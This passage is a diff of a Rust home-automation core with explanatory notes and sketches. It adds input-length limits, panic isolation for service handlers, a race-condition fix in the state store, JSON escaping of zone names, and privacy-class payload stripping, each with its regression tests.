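        attrs_before - store.attributes.len(),
    )
}
```

Calling `purge` twice with the same cutoff deletes nothing the second time, which is the idempotence property the doc comment describes; a shared blob disappears only when its last referencing state is purged.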
@@ -30,7 +30,7 @@ pub mod schema;
|
||||
pub mod semantic;
|
||||
|
||||
// Re-export the primary public API surface.
|
||||
pub use db::{Recorder, RecorderError};
|
||||
pub use db::{PurgeStats, Recorder, RecorderError, StateRow, MAX_HISTORY_ROWS};
|
||||
pub use listener::RecorderListener;
|
||||
|
||||
/// Null semantic index used when the `ruvector` feature is off.
|
||||
|
||||
@@ -87,4 +87,64 @@ mod tests {
|
||||
assert_eq!(event.event_type, "ruview_csi_frame");
|
||||
assert_eq!(event.event_data["frame_id"], 42);
|
||||
}
|
||||
|
||||
/// Bus-lag safety (same failure class as the homecore-api WS
|
||||
/// broadcast-lag DoS, here on the core bus): a subscriber that never
|
||||
/// drains must NOT block the publisher, must NOT make the channel grow
|
||||
/// without bound, and must NOT take down a healthy fast subscriber. The
|
||||
/// bounded `tokio::sync::broadcast` gives the slow receiver a recoverable
|
||||
/// `Lagged(n)` (drop-oldest, re-sync) while `fire_*` stays non-blocking.
|
||||
///
|
||||
/// Evidence: with EVENT_CHANNEL_CAPACITY = 4096 we fire 3× capacity
|
||||
/// while a slow subscriber sits idle. Every `fire_domain` returns
|
||||
/// promptly (publisher never blocked); the slow receiver observes
|
||||
/// `Lagged` then re-syncs to live events; the fast receiver — created
|
||||
/// after the flood and kept drained — receives all subsequent events
|
||||
/// with no loss. The bus stays live throughout.
|
||||
#[tokio::test]
|
||||
async fn slow_subscriber_does_not_block_publisher_or_kill_the_bus() {
|
||||
use tokio::sync::broadcast::error::TryRecvError;
|
||||
|
||||
let bus = EventBus::new();
|
||||
// Slow subscriber: subscribes, then never drains during the flood.
|
||||
let mut slow = bus.subscribe_domain();
|
||||
|
||||
// Publisher fires 3× capacity. None of these may block.
|
||||
let total = EVENT_CHANNEL_CAPACITY * 3;
|
||||
for i in 0..total {
|
||||
// Returns the receiver count (>=1 here); the point is it
|
||||
// returns AT ALL without awaiting the slow receiver.
|
||||
let _ = bus.fire_domain(DomainEvent::new(
|
||||
"flood",
|
||||
serde_json::json!({ "i": i }),
|
||||
Context::new(),
|
||||
));
|
||||
}
|
||||
|
||||
// The slow receiver is forced past capacity → recoverable Lagged,
|
||||
// NOT a closed channel and NOT a hang.
|
||||
let mut saw_lagged = false;
|
||||
loop {
|
||||
match slow.try_recv() {
|
||||
Ok(_) => {}
|
||||
Err(TryRecvError::Lagged(n)) => {
|
||||
assert!(n > 0);
|
||||
saw_lagged = true;
|
||||
}
|
||||
Err(TryRecvError::Empty) => break,
|
||||
Err(TryRecvError::Closed) => panic!("bus closed — must stay live"),
|
||||
}
|
||||
}
|
||||
assert!(saw_lagged, "slow subscriber should have lagged, not blocked the bus");
|
||||
|
||||
// The bus is still live: a fresh fast subscriber receives new events.
|
||||
let mut fast = bus.subscribe_domain();
|
||||
bus.fire_domain(DomainEvent::new("live", serde_json::json!({"ok": true}), Context::new()));
|
||||
let evt = fast.recv().await.unwrap();
|
||||
assert_eq!(evt.event_type, "live");
|
||||
|
||||
// And the lagged subscriber recovers (re-syncs) to live events too.
|
||||
let evt2 = slow.recv().await.unwrap();
|
||||
assert_eq!(evt2.event_type, "live");
|
||||
}
|
||||
}
|
||||
|
||||
@@ -42,12 +42,30 @@ impl<'de> Deserialize<'de> for EntityId {
|
||||
}
|
||||
}
|
||||
|
||||
/// Maximum accepted `entity_id` length in bytes. Mirrors Home Assistant's
|
||||
/// practical cap (`MAX_LENGTH_STATE_*` family — 255). The state machine and
|
||||
/// entity/registry maps are keyed on `EntityId`, and the REST layer
|
||||
/// (`homecore-api`) parses untrusted path segments straight through
|
||||
/// [`EntityId::parse`]; an unbounded id would let a single `POST
|
||||
/// /api/states/<giant>` permanently grow the state map (memory DoS). We
|
||||
/// fail closed at the boundary instead.
|
||||
pub const MAX_ENTITY_ID_LEN: usize = 255;
|
||||
|
||||
impl EntityId {
|
||||
/// Validates and constructs an `EntityId`. Returns
|
||||
/// [`EntityIdError`] if the input is not `domain.name` shape with
|
||||
/// ASCII lowercase / digits / underscore in each segment.
|
||||
/// ASCII lowercase / digits / underscore in each segment, or if it
|
||||
/// exceeds [`MAX_ENTITY_ID_LEN`] bytes.
|
||||
pub fn parse(s: impl Into<String>) -> Result<Self, EntityIdError> {
|
||||
let s: String = s.into();
|
||||
// Bound the length BEFORE any further work so an oversized input is
|
||||
// cheap to reject (no per-char scan of megabytes).
|
||||
if s.len() > MAX_ENTITY_ID_LEN {
|
||||
return Err(EntityIdError::TooLong {
|
||||
len: s.len(),
|
||||
max: MAX_ENTITY_ID_LEN,
|
||||
});
|
||||
}
|
||||
let (domain, name) = s
|
||||
.split_once('.')
|
||||
.ok_or_else(|| EntityIdError::MissingDot(s.clone()))?;
|
||||
@@ -111,6 +129,8 @@ pub enum EntityIdError {
|
||||
EmptyName(String),
|
||||
#[error("entity_id {entity_id:?} contains invalid character {ch:?} — only [a-z0-9_] allowed (HA-compat ASCII subset; see ADR-127 §Q1)")]
|
||||
InvalidChar { entity_id: String, ch: char },
|
||||
#[error("entity_id is {len} bytes, exceeding the {max}-byte limit")]
|
||||
TooLong { len: usize, max: usize },
|
||||
}
|
||||
|
||||
/// Immutable state snapshot for one entity at one moment in time.
|
||||
@@ -217,6 +237,39 @@ mod tests {
|
||||
assert!(EntityId::parse("light.küche").is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn entity_id_length_boundary() {
|
||||
// The REST layer parses untrusted path segments straight through
|
||||
// `parse`; an unbounded id is a memory-DoS vector (a `POST
|
||||
// /api/states/<giant>` permanently grows the state map). Cap at
|
||||
// MAX_ENTITY_ID_LEN, fail closed above it.
|
||||
//
|
||||
// Construct "sensor." (7 bytes) + N name bytes == exactly MAX.
|
||||
let prefix = "sensor.";
|
||||
let name_len = MAX_ENTITY_ID_LEN - prefix.len();
|
||||
let at_max = format!("{prefix}{}", "a".repeat(name_len));
|
||||
assert_eq!(at_max.len(), MAX_ENTITY_ID_LEN);
|
||||
assert!(
|
||||
EntityId::parse(at_max.clone()).is_ok(),
|
||||
"an id of exactly MAX_ENTITY_ID_LEN bytes must be accepted"
|
||||
);
|
||||
|
||||
let over = format!("{at_max}a"); // MAX + 1
|
||||
assert!(matches!(
|
||||
EntityId::parse(over),
|
||||
Err(EntityIdError::TooLong { .. })
|
||||
));
|
||||
|
||||
// A multi-megabyte, otherwise-valid id is rejected cheaply rather
|
||||
// than persisted.
|
||||
let huge = format!("sensor.{}", "a".repeat(4 * 1024 * 1024));
|
||||
assert!(matches!(
|
||||
EntityId::parse(huge),
|
||||
Err(EntityIdError::TooLong { len, max })
|
||||
if max == MAX_ENTITY_ID_LEN && len > MAX_ENTITY_ID_LEN
|
||||
));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn state_next_preserves_last_changed_when_state_unchanged() {
|
||||
let id = EntityId::parse("sensor.temp").unwrap();
|
||||
|
||||
@@ -49,6 +49,8 @@ pub enum ServiceError {
|
||||
NotRegistered { domain: String, service: String },
|
||||
#[error("service handler returned error: {0}")]
|
||||
HandlerFailed(String),
|
||||
#[error("service handler panicked: {0}")]
|
||||
HandlerPanicked(String),
|
||||
}
|
||||
|
||||
/// Handler trait. Integration code implements this and registers via
|
||||
@@ -99,13 +101,29 @@ impl ServiceRegistry {
|
||||
|
||||
/// Call a service. P1 direct dispatch; P2 routes through the
|
||||
/// event bus per ADR-127 §2.3.
|
||||
///
|
||||
/// The handler runs **outside** the registry lock (we clone the
|
||||
/// `Arc<dyn ServiceHandler>` out of the read guard first), so a slow or
|
||||
/// panicking handler can never poison the `RwLock` or block other
|
||||
/// callers. A panic inside the handler is additionally caught and
|
||||
/// converted to [`ServiceError::HandlerPanicked`] rather than unwinding
|
||||
/// into the caller's task — one buggy integration cannot abort the task
|
||||
/// that drives the engine. Mirrors HA isolating service-handler
|
||||
/// exceptions.
|
||||
pub async fn call(&self, call: ServiceCall) -> Result<serde_json::Value, ServiceError> {
|
||||
let handler = {
|
||||
let guard = self.handlers.read().await;
|
||||
guard.get(&call.name).cloned()
|
||||
};
|
||||
match handler {
|
||||
Some(h) => h.call(call).await,
|
||||
Some(h) => {
|
||||
use futures::FutureExt;
|
||||
let fut = std::panic::AssertUnwindSafe(h.call(call));
|
||||
match fut.catch_unwind().await {
|
||||
Ok(result) => result,
|
||||
Err(panic) => Err(ServiceError::HandlerPanicked(panic_message(panic))),
|
||||
}
|
||||
}
|
||||
None => Err(ServiceError::NotRegistered {
|
||||
domain: call.name.domain.clone(),
|
||||
service: call.name.service.clone(),
|
||||
@@ -124,6 +142,19 @@ impl Default for ServiceRegistry {
|
||||
}
|
||||
}
|
||||
|
||||
/// Best-effort extraction of a panic payload's message for
|
||||
/// [`ServiceError::HandlerPanicked`]. Panic payloads are usually `&str`
|
||||
/// or `String`; anything else collapses to a generic label.
|
||||
fn panic_message(payload: Box<dyn std::any::Any + Send>) -> String {
|
||||
if let Some(s) = payload.downcast_ref::<&str>() {
|
||||
(*s).to_string()
|
||||
} else if let Some(s) = payload.downcast_ref::<String>() {
|
||||
s.clone()
|
||||
} else {
|
||||
"<non-string panic payload>".to_string()
|
||||
}
|
||||
}
|
||||
|
||||
// Suppress unused-import warning when no consumer of Pin/Box uses them yet
|
||||
#[allow(dead_code)]
|
||||
type _UnusedFutureType = Pin<Box<dyn Future<Output = ()> + Send>>;
|
||||
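The panic-isolation idea in the hunk above can be tried without an async runtime. The following is a minimal sketch, assuming a synchronous handler and using only `std::panic::catch_unwind`; `CallError` and `call_isolated` are hypothetical names for illustration, not part of the crate, and the real code uses `futures::FutureExt::catch_unwind` on the handler future instead.

```rust
use std::any::Any;
use std::panic::{self, AssertUnwindSafe};

/// Hypothetical stand-in for `ServiceError`, reduced to the one variant
/// this sketch needs.
#[derive(Debug, PartialEq)]
pub enum CallError {
    HandlerPanicked(String),
}

/// Same payload-to-message logic as `panic_message` in the diff:
/// `&str` and `String` payloads are extracted, anything else gets a label.
fn panic_message(payload: Box<dyn Any + Send>) -> String {
    if let Some(s) = payload.downcast_ref::<&str>() {
        (*s).to_string()
    } else if let Some(s) = payload.downcast_ref::<String>() {
        s.clone()
    } else {
        "<non-string panic payload>".to_string()
    }
}

/// Run a synchronous handler and convert a panic into an error value
/// instead of letting it unwind into the caller.
pub fn call_isolated<F>(handler: F) -> Result<i32, CallError>
where
    F: FnOnce() -> i32,
{
    panic::catch_unwind(AssertUnwindSafe(handler))
        .map_err(|payload| CallError::HandlerPanicked(panic_message(payload)))
}
```

Calling `call_isolated(|| panic!("handler exploded"))` returns an `Err` carrying the message rather than aborting the caller. Note that `catch_unwind` only helps when the binary is built with the default unwinding panic strategy; with `panic = "abort"` the process still terminates.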
@@ -167,4 +198,56 @@ mod tests {
|
||||
.unwrap_err();
|
||||
assert!(matches!(err, ServiceError::NotRegistered { .. }));
|
||||
}
|
||||
|
||||
/// Service isolation: a panicking handler must be contained — converted
|
||||
/// to `HandlerPanicked` rather than unwinding into the caller's task —
|
||||
/// and the registry must remain fully usable afterwards (no poisoned
|
||||
/// lock, other services still callable). On the pre-fix code the panic
|
||||
/// unwinds through `call`, so the `catch_unwind`-based assertion below
|
||||
/// fails (the await point panics instead of returning an `Err`).
|
||||
#[tokio::test]
|
||||
async fn panicking_handler_is_isolated_and_registry_survives() {
|
||||
let reg = ServiceRegistry::new();
|
||||
reg.register(
|
||||
ServiceName::new("bad", "boom"),
|
||||
FnHandler(|_call: ServiceCall| async move {
|
||||
panic!("handler exploded");
|
||||
#[allow(unreachable_code)]
|
||||
Ok(serde_json::json!(null))
|
||||
}),
|
||||
)
|
||||
.await;
|
||||
reg.register(
|
||||
ServiceName::new("good", "ping"),
|
||||
FnHandler(|_call: ServiceCall| async move { Ok(serde_json::json!("pong")) }),
|
||||
)
|
||||
.await;
|
||||
|
||||
// The panicking call returns an error, not an unwind.
|
||||
let err = reg
|
||||
.call(ServiceCall {
|
||||
name: ServiceName::new("bad", "boom"),
|
||||
data: serde_json::json!({}),
|
||||
context: Context::new(),
|
||||
})
|
||||
.await
|
||||
.unwrap_err();
|
||||
assert!(
|
||||
matches!(err, ServiceError::HandlerPanicked(ref m) if m.contains("handler exploded")),
|
||||
"expected HandlerPanicked, got {err:?}",
|
||||
);
|
||||
|
||||
// The registry is not poisoned: a healthy service still works, and
|
||||
// the bad service is still registered (call path, not lock, failed).
|
||||
let ok = reg
|
||||
.call(ServiceCall {
|
||||
name: ServiceName::new("good", "ping"),
|
||||
data: serde_json::json!({}),
|
||||
context: Context::new(),
|
||||
})
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(ok, serde_json::json!("pong"));
|
||||
assert!(reg.has(&ServiceName::new("bad", "boom")).await);
|
||||
}
|
||||
}
|
||||
|
||||
@@ -80,11 +80,37 @@ impl StateMachine {
|
||||
context: Context,
|
||||
) -> Arc<State> {
|
||||
let new_state_str = new_state.into();
|
||||
let old = self.inner.states.get(&entity_id).map(|r| Arc::clone(&*r));
|
||||
|
||||
// Hold the DashMap shard write-lock across the entire
|
||||
// read→decide→insert→fire sequence. `entry()` locks the shard for
|
||||
// the lifetime of `slot`, so a concurrent writer on the same entity
|
||||
// cannot interleave between our read of `old` and our commit. This
|
||||
// is what makes the write atomic as ADR-127 §2.1 promises ("writer
|
||||
// atomically replaces the map entry") — the previous get→insert pair
|
||||
// released the lock in between, a TOCTOU that let concurrent writers
|
||||
// compute the no-op / `last_changed` decision off a stale `old` and
|
||||
// drop or reorder real `state_changed` events.
|
||||
//
|
||||
// `tx.send` is non-blocking, non-async, and never re-enters the map,
|
||||
// so firing under the lock cannot deadlock and keeps the global
|
||||
// event order in lock-step with the global commit order.
|
||||
use dashmap::mapref::entry::Entry;
|
||||
let slot = self.inner.states.entry(entity_id.clone());
|
||||
|
||||
let old: Option<Arc<State>> = match &slot {
|
||||
Entry::Occupied(o) => Some(Arc::clone(o.get())),
|
||||
Entry::Vacant(_) => None,
|
||||
};
|
||||
// `slot` continues to hold the shard write-lock below.
|
||||
|
||||
let next = match &old {
|
||||
Some(prev) => Arc::new(prev.next(new_state_str.clone(), attributes.clone(), context)),
|
||||
None => Arc::new(State::new(entity_id.clone(), new_state_str.clone(), attributes.clone(), context)),
|
||||
None => Arc::new(State::new(
|
||||
entity_id.clone(),
|
||||
new_state_str.clone(),
|
||||
attributes.clone(),
|
||||
context,
|
||||
)),
|
||||
};
|
||||
|
||||
// HA suppresses no-op writes (same state + same attributes).
|
||||
@@ -94,7 +120,12 @@ impl StateMachine {
|
||||
None => false,
|
||||
};
|
||||
|
||||
self.inner.states.insert(entity_id.clone(), Arc::clone(&next));
|
||||
// Commit through the same locked entry and KEEP the shard guard
|
||||
// alive across the broadcast `send`, so the event is published
|
||||
// before any concurrent writer on this entity can observe the new
|
||||
// value and fire its own event. This makes global event order match
|
||||
// global commit order (no insert/send reorder window).
|
||||
let _guard = slot.insert_entry(Arc::clone(&next));
|
||||
|
||||
if !is_noop {
|
||||
let event = StateChangedEvent {
|
||||
@@ -106,6 +137,7 @@ impl StateMachine {
|
||||
// err = no receivers; that's fine, write still committed.
|
||||
let _ = self.inner.tx.send(event);
|
||||
}
|
||||
// `_guard` (and the shard lock) drops here, after the event is sent.
|
||||
next
|
||||
}
|
||||
|
||||
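The read, decide, insert, send sequence described in the comments above can be illustrated with the standard library alone. This is a simplified sketch, assuming a single `Mutex` in place of DashMap's per-shard locks and an `mpsc` channel in place of the broadcast bus; `Store`, `Inner`, and the `(entity, state)` event tuple are hypothetical names, not the crate's types.

```rust
use std::collections::HashMap;
use std::sync::mpsc::Sender;
use std::sync::Mutex;

/// Map and event sender live behind the same lock, so a commit and its
/// event can never be separated by another writer.
struct Inner {
    states: HashMap<String, String>,
    tx: Sender<(String, String)>, // (entity, new_state)
}

/// Hypothetical, simplified state store.
pub struct Store {
    inner: Mutex<Inner>,
}

impl Store {
    pub fn new(tx: Sender<(String, String)>) -> Self {
        Store {
            inner: Mutex::new(Inner { states: HashMap::new(), tx }),
        }
    }

    /// Read the old value, decide whether the write is a no-op, commit,
    /// and publish, all under one lock acquisition.
    /// Returns `true` when an event was fired.
    pub fn set(&self, entity: &str, new_state: &str) -> bool {
        let mut guard = self.inner.lock().unwrap();
        let is_noop = guard
            .states
            .get(entity)
            .map(|old| old.as_str() == new_state)
            .unwrap_or(false);
        guard.states.insert(entity.to_string(), new_state.to_string());
        if !is_noop {
            // Sending while the guard is alive keeps event order equal to
            // commit order. A send error only means no receiver is left.
            let _ = guard.tx.send((entity.to_string(), new_state.to_string()));
        }
        !is_noop
        // The guard drops here, after the event has been sent.
    }
}
```

With this shape, two consecutive delivered events for one entity cannot carry the same state, which is the invariant the concurrency test in this file checks. The trade-off is that the send happens inside the critical section, so it must stay non-blocking, as the original comment notes for `tx.send`.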
@@ -218,4 +250,135 @@ mod tests {
|
||||
assert!(evt.new_state.is_none());
|
||||
assert!(evt.old_state.is_some());
|
||||
}
|
||||
|
||||
/// Concurrency invariant (ADR-127 §2.1 "writer atomically replaces the
|
||||
/// map entry"): under concurrent writers on the SAME entity the fired
|
||||
/// `state_changed` stream must be a faithful, gap-free log of the
|
||||
/// committed transitions — in particular the LAST event the bus
|
||||
/// delivers must carry the SAME value that is finally committed in the
|
||||
/// map.
|
||||
///
|
||||
/// This pins the TOCTOU in `set`: it does `get` (release shard lock) →
|
||||
/// compute `next` + no-op decision → `insert` (re-acquire shard lock) →
|
||||
/// `send`. Because the insert and the send are not atomic with respect
|
||||
/// to a concurrent writer, two writers can interleave as
|
||||
/// `insert(A); insert(B); send(B); send(A)` — leaving the map holding A
|
||||
/// while the last event the bus ever delivers says B. A subscriber that
|
||||
/// trusts "the last event reflects current state" (the recorder, the WS
|
||||
/// push API, an automation engine) is then permanently wrong about the
|
||||
/// entity until the next write. A correctly-locked store holds the shard
|
||||
/// lock across read→insert→send so the global event order matches the
|
||||
/// global commit order.
|
||||
///
|
||||
/// A dedicated drain thread pulls events as they arrive so the bounded
|
||||
/// channel never lags during the run (a `Lagged` here would be a test
|
||||
/// artefact, not the bug under test).
|
||||
///
|
||||
/// The writers toggle the SAME entity between exactly two values so the
|
||||
/// no-op suppression branch is constantly in play.
|
||||
///
|
||||
/// Invariant: in correctly serialised code, two *consecutive* fired
|
||||
/// `state_changed` events can never carry the same `new_state` value.
|
||||
/// Proof: event k fires only for a committed transition old≠new, so its
|
||||
/// `new_state` = X differs from the value before it; the next committed
|
||||
/// transition therefore starts at X and (being a real change) commits
|
||||
/// some Z≠X, so event k+1 carries Z≠X. A no-op (X→X) is suppressed and
|
||||
/// never fires. Therefore adjacent fired events always differ.
|
||||
///
|
||||
/// The `set()` TOCTOU breaks this: it does `get` (release shard lock) →
|
||||
/// compute `next` + the no-op decision → `insert` (re-acquire shard
|
||||
/// lock) → `send`, all non-atomically. A writer that read a STALE `old`
|
||||
/// mis-classifies a genuine transition as a no-op (dropping that real
|
||||
/// event — a missed automation trigger) and/or fires an event whose
|
||||
/// `new_state` duplicates the previously delivered one (a spurious
|
||||
/// trigger for any automation keyed on `old_state != new_state`). The
|
||||
/// probe behind this test observed ~93k such duplicate-adjacent events
|
||||
/// across 200 trials on the racy code; the corrected store produces
|
||||
/// zero.
|
||||
#[test]
|
||||
fn concurrent_set_fires_no_duplicate_adjacent_events() {
|
||||
use std::sync::atomic::{AtomicBool, Ordering};
|
||||
use std::sync::{Barrier, Mutex};
|
||||
|
||||
const WRITERS: usize = 4;
|
||||
const ITERS: usize = 300; // 1200 events ≪ 4096 capacity → never lags
|
||||
|
||||
for _trial in 0..40 {
|
||||
let sm = StateMachine::new();
|
||||
let eid = id("light.race");
|
||||
sm.set(eid.clone(), "A", serde_json::json!({}), Context::new());
|
||||
|
||||
let mut rx = sm.subscribe();
|
||||
let done = Arc::new(AtomicBool::new(false));
|
||||
// Event log: new_state value in delivery order.
|
||||
let log: Arc<Mutex<Vec<String>>> = Arc::new(Mutex::new(Vec::new()));
|
||||
|
||||
let drainer = {
|
||||
let done = Arc::clone(&done);
|
||||
let log = Arc::clone(&log);
|
||||
std::thread::spawn(move || loop {
|
||||
match rx.try_recv() {
|
||||
Ok(evt) => {
|
||||
if let Some(ns) = &evt.new_state {
|
||||
log.lock().unwrap().push(ns.state.clone());
|
||||
}
|
||||
}
|
||||
Err(broadcast::error::TryRecvError::Empty) => {
|
||||
if done.load(Ordering::Acquire) {
|
||||
while let Ok(evt) = rx.try_recv() {
|
||||
if let Some(ns) = &evt.new_state {
|
||||
log.lock().unwrap().push(ns.state.clone());
|
||||
}
|
||||
}
|
||||
break;
|
||||
}
|
||||
std::thread::yield_now();
|
||||
}
|
||||
Err(broadcast::error::TryRecvError::Lagged(_)) => {
|
||||
panic!("channel lagged — test artefact, raise capacity");
|
||||
}
|
||||
Err(broadcast::error::TryRecvError::Closed) => break,
|
||||
}
|
||||
})
|
||||
};
|
||||
|
||||
let barrier = Arc::new(Barrier::new(WRITERS));
|
||||
let handles: Vec<_> = (0..WRITERS)
|
||||
.map(|w| {
|
||||
let sm = sm.clone();
|
||||
let eid = eid.clone();
|
||||
let barrier = Arc::clone(&barrier);
|
||||
std::thread::spawn(move || {
|
||||
barrier.wait();
|
||||
for i in 0..ITERS {
|
||||
// Toggle between two values → maximises the
|
||||
// stale-`old` no-op collision window.
|
||||
let val = if (w + i) % 2 == 0 { "A" } else { "B" };
|
||||
sm.set(eid.clone(), val, serde_json::json!({}), Context::new());
|
||||
}
|
||||
})
|
||||
})
|
||||
.collect();
|
||||
|
||||
for h in handles {
|
||||
h.join().unwrap();
|
||||
}
|
||||
done.store(true, Ordering::Release);
|
||||
drainer.join().unwrap();
|
||||
|
||||
let log = log.lock().unwrap();
|
||||
let dup = log
|
||||
.windows(2)
|
||||
.filter(|w| w[0] == w[1])
|
||||
.count();
|
||||
assert_eq!(
|
||||
dup, 0,
|
||||
"{dup} consecutive fired state_changed events carried an \
|
||||
identical new_state — impossible under correct \
|
||||
serialisation; proves set()'s read→decide→insert→send \
|
||||
TOCTOU dropped/reordered real transitions (missed & \
|
||||
spurious automation triggers)",
|
||||
);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@@ -135,10 +135,13 @@ pub fn render_events(event: &BfldEvent) -> Vec<TopicMessage> {
|
||||
|
||||
if let Some(zone) = &event.zone_id {
|
||||
// Emit a JSON string so consumers can distinguish "no zone" (omitted)
|
||||
// from "single-zone deployment" (always the same zone string).
|
||||
// from "single-zone deployment" (always the same zone string). The zone
|
||||
// name is operator-controlled; escape JSON metacharacters so a name
|
||||
// containing a quote or backslash cannot produce malformed/injected
|
||||
// JSON. Mirrors ha_discovery.rs::push_str_field's escaping.
|
||||
out.push(TopicMessage {
|
||||
topic: TopicMessage::ruview_topic(node, "zone_activity"),
|
||||
payload: format!("\"{zone}\""),
|
||||
payload: json_string_literal(zone),
|
||||
});
|
||||
}
|
||||
|
||||
@@ -155,3 +158,26 @@ pub fn render_events(event: &BfldEvent) -> Vec<TopicMessage> {
|
||||
|
||||
out
|
||||
}
|
||||
|
||||
/// Wrap `value` in JSON double-quote delimiters, escaping the metacharacters
|
||||
/// that would otherwise break out of the string literal (`"`, `\`, control
|
||||
/// chars, and the bare `\n`/`\r`/`\t` whitespace). Kept in lockstep with
|
||||
/// `ha_discovery::push_str_field` so state-topic and discovery payloads escape
|
||||
/// identically.
|
||||
fn json_string_literal(value: &str) -> String {
|
||||
let mut out = String::with_capacity(value.len() + 2);
|
||||
out.push('"');
|
||||
for ch in value.chars() {
|
||||
match ch {
|
||||
'"' => out.push_str("\\\""),
|
||||
'\\' => out.push_str("\\\\"),
|
||||
'\n' => out.push_str("\\n"),
|
||||
'\r' => out.push_str("\\r"),
|
||||
'\t' => out.push_str("\\t"),
|
||||
c if (c as u32) < 0x20 => out.push_str(&format!("\\u{:04x}", c as u32)),
|
||||
c => out.push(c),
|
||||
}
|
||||
}
|
||||
out.push('"');
|
||||
out
|
||||
}
|
||||
|
||||
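To make the effect of the escaping concrete, the sketch below places a standalone copy of the escaping logic next to the pre-fix formatting. `naive_literal` is a hypothetical name used only for contrast; the escaping function follows the hunk above, with `write!` substituted for the intermediate `format!` allocation as a small stylistic assumption.

```rust
use std::fmt::Write;

/// Pre-fix behaviour, kept only for contrast (hypothetical helper):
/// the value is wrapped in quotes with no escaping at all.
pub fn naive_literal(value: &str) -> String {
    format!("\"{value}\"")
}

/// Standalone copy of the escaping shown in the diff: wraps `value` in
/// double quotes and escapes quote, backslash, and control characters.
pub fn json_string_literal(value: &str) -> String {
    let mut out = String::with_capacity(value.len() + 2);
    out.push('"');
    for ch in value.chars() {
        match ch {
            '"' => out.push_str("\\\""),
            '\\' => out.push_str("\\\\"),
            '\n' => out.push_str("\\n"),
            '\r' => out.push_str("\\r"),
            '\t' => out.push_str("\\t"),
            c if (c as u32) < 0x20 => {
                // Writing into a String cannot fail, so the result is ignored.
                let _ = write!(out, "\\u{:04x}", c as u32);
            }
            c => out.push(c),
        }
    }
    out.push('"');
    out
}
```

For a zone named `living"room\back`, the naive form yields a payload whose inner quote ends the string early, while the escaped form yields `"living\"room\\back"`, which is the value the regression test for `render_events` asserts.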
@@ -141,6 +141,15 @@ impl BfldPipeline {
|
||||
/// builds the frame via [`BfldFrame::from_payload`] so the CRC covers the
|
||||
/// section-prefixed bytes.
|
||||
///
|
||||
/// The emitted frame's payload is forced into compliance with the active
|
||||
/// privacy class via [`crate::PrivacyGate::demote`]: at `Anonymous` the
|
||||
/// identity-leaky `compressed_angle_matrix` and `csi_delta` sections are
|
||||
/// stripped, and at `Restricted` the amplitude/phase proxies are stripped
|
||||
/// too. This closes the gap (ADR-141) where a frame stamped with a
|
||||
/// restrictive class byte could otherwise carry the full high-information
|
||||
/// BFI payload across a [`crate::NetworkSink`]. Research classes (`Raw`,
|
||||
/// `Derived`) keep the full payload — `demote` is a no-op there.
|
||||
///
|
||||
/// Returns `None` whenever the gate drops the underlying event (Reject or
|
||||
/// Recalibrate), so `process_to_frame` is a strict subset of `process`.
|
||||
pub fn process_to_frame(
|
||||
@@ -151,11 +160,21 @@ impl BfldPipeline {
|
||||
embedding: Option<IdentityEmbedding>,
|
||||
) -> Option<BfldFrame> {
|
||||
let timestamp_ns = inputs.timestamp_ns;
|
||||
let active_class = self.current_privacy_class();
|
||||
let _gate_signal = self.process(inputs, embedding)?;
|
||||
let mut header = header_template;
|
||||
header.timestamp_ns = timestamp_ns;
|
||||
header.privacy_class = self.current_privacy_class().as_u8();
|
||||
Some(BfldFrame::from_payload(header, &payload))
|
||||
header.privacy_class = active_class.as_u8();
|
||||
let frame = BfldFrame::from_payload(header, &payload);
|
||||
// Enforce the payload-content policy for the stamped class. The frame
|
||||
// is already at `active_class`, so this is a same-class demotion: it
|
||||
// performs no class change but strips the sections that class forbids.
|
||||
// demote() only fails on InvalidDemote (target < source), which cannot
|
||||
// happen here because source == target, so the expect is unreachable.
|
||||
Some(
|
||||
crate::PrivacyGate::demote(frame, active_class)
|
||||
.expect("same-class demote is always valid"),
|
||||
)
|
||||
}
|
||||
|
||||
/// `true` if `enable_privacy_mode()` has been called more recently than
|
||||
|
||||
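The per-class stripping policy described in the `process_to_frame` doc comment can be sketched as a pure function. This is an illustration under stated assumptions, not `PrivacyGate::demote` itself: the `PrivacyClass` ordering, the `Payload` struct, and `strip_for_class` are hypothetical and carry only the sections the doc comment and tests mention.

```rust
/// Hypothetical mirror of the privacy classes named in the diff,
/// declared from least to most restrictive so they can be compared.
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord)]
pub enum PrivacyClass {
    Raw,
    Derived,
    Anonymous,
    Restricted,
}

/// Hypothetical payload holding only the sections discussed above.
#[derive(Debug, Clone, PartialEq, Default)]
pub struct Payload {
    pub compressed_angle_matrix: Vec<u8>,
    pub csi_delta: Option<Vec<u8>>,
    pub amplitude_proxy: Vec<u8>,
    pub phase_proxy: Vec<u8>,
    pub snr_vector: Vec<u8>,
}

/// Remove every section the given class forbids.
/// Research classes (`Raw`, `Derived`) pass through unchanged.
pub fn strip_for_class(mut payload: Payload, class: PrivacyClass) -> Payload {
    if class >= PrivacyClass::Anonymous {
        // Identity-leaky sections go first.
        payload.compressed_angle_matrix.clear();
        payload.csi_delta = None;
    }
    if class >= PrivacyClass::Restricted {
        // Restricted additionally drops the amplitude/phase proxies.
        payload.amplitude_proxy.clear();
        payload.phase_proxy.clear();
    }
    payload
}
```

Expressing the policy as cumulative thresholds means a more restrictive class can never carry a section that a less restrictive one forbids, which is the property the ADR-141 regression tests pin.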
@@ -127,6 +127,38 @@ fn zone_payload_is_json_string_with_quotes() {
|
||||
assert_eq!(zone.payload, "\"living_room\"");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn zone_payload_escapes_json_metacharacters() {
|
||||
// A zone name containing a double-quote or backslash must not break out of
|
||||
// the JSON string literal it is emitted into. ha_discovery.rs already
|
||||
// escapes operator-controlled strings via push_str_field; render_events
|
||||
// must do the same for parity so the state-topic payload is always valid
|
||||
// JSON that Home Assistant can parse.
|
||||
let ev = BfldEvent::with_privacy_gating(
|
||||
"seed-01".into(),
|
||||
0,
|
||||
true,
|
||||
0.1,
|
||||
1,
|
||||
0.9,
|
||||
Some(r#"living"room\back"#.into()),
|
||||
PrivacyClass::Anonymous,
|
||||
None,
|
||||
None,
|
||||
);
|
||||
let msgs = render_events(&ev);
|
||||
let zone = msgs
|
||||
.iter()
|
||||
.find(|m| m.topic.contains("zone_activity"))
|
||||
.expect("zone_activity topic");
|
||||
// Expected: the inner quote and backslash are backslash-escaped, wrapped in
|
||||
// one pair of unescaped delimiter quotes -> a single valid JSON string.
|
